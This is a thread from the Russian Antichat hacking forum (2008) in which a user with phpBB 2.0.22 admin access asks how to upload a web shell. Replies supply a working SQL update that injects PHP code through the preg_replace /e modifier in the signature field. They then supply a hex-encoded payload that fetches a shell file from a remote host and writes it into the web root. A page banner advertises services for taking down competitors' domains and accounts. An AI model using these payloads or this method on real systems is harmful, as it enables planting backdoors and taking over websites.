Форум АНТИЧАТ - заливка shell

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
заливка shell - phpbb2

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

заливка shell - phpbb2

17.04.2008, 18:59

number0

Познающий

Регистрация: 01.03.2008

Сообщений: 39

Провел на форуме:
210936

Репутация: 24

заливка shell - phpbb2

Здраствуйте! Версия форума 2.0.22 чистый (без модов). Что есть:
1. админский акуант (доступ в админку)
2. серверный путь к форуму
3. config.php
ftp доступа нету. =( БД не root.

Собственно вопрос... как загрузить shell ?

17.04.2008, 19:04

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

глянь
https://forum.antichat.ru/thread24488.html
и тут на ачате видео еще было по заливки шелла через бд

17.04.2008, 19:07

vp$

Участник форума

Регистрация: 22.10.2007

Сообщений: 138

Провел на форуме:
2454040

Репутация: 177

Отправить сообщение для vp$ с помощью ICQ

если file_priv=N
то никакое видео не поможет, и врятли что то можно сделать

17.04.2008, 19:20

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

несколько раз заливал через

Цитата:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb

hpinfo()' WHERE user_id=2;

но при этом у меня всегда был доступ к БД, через phpMyAdmin
насчет твоей версии незнаю

__________________
Карфаген должен быть разрушен...

17.04.2008, 19:29

number0

Познающий

Регистрация: 01.03.2008

Сообщений: 39

Провел на форуме:
210936

Репутация: 24

на форуме майскл имеет права file_priv=N

17.04.2008, 19:32

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

для того способа который я сказал file_priv не имеет значения

__________________
Карфаген должен быть разрушен...

17.04.2008, 19:39

number0

Познающий

Регистрация: 01.03.2008

Сообщений: 39

Провел на форуме:
210936

Репутация: 24

Цитата:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb

hpinfo()' WHERE user_id=2;

Да, сроботал. PHP Version показало.
мм.. может уже есть и готовый шелл под скрипт выше указаный? С99 хотелось бы...

Последний раз редактировалось number0; 17.04.2008 в 19:41..

17.04.2008, 19:44

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

в user_sig пропиши phpbb:copy("http://путь до шелла/шелл.txt","/путь до папки/куда лить/шелл.php")

__________________
Карфаген должен быть разрушен...

17.04.2008, 19:59

number0

Познающий

Регистрация: 01.03.2008

Сообщений: 39

Провел на форуме:
210936

Репутация: 24

Цитата:

UPDATE phpbb_users SET user_sig_phpbb:copy=("http://192.168.10.5/db.txt","/var/www/html/forum/db.php") WHERE user_id=2;

Не дало востановить БД. Где-то ошибочку допустил.. подправте пожалуйста.

Цитата:

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near

#10

17.04.2008, 20:04

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Код:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F3139322E3136382E31302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;

не забудь пробелы убрать здесь:
F2F3 139322E3136382E31302E352F64622E747874222C222F76617 22F

__________________
Карфаген должен быть разрушен...

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
webshell scripts -)	blackybr	PHP, PERL, MySQL, JavaScript	20	28.03.2010 02:17
заливка шела через Koobi CMS	vp$	Сценарии/CMF/СMS	2	14.06.2008 08:43
Unix shell: работа, программы SSH	PandoraBox	Soft - *nix	3	08.04.2008 23:58
бэкап бд в phpBB2 Plus	IGEMON	Форумы	6	09.02.2008 01:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход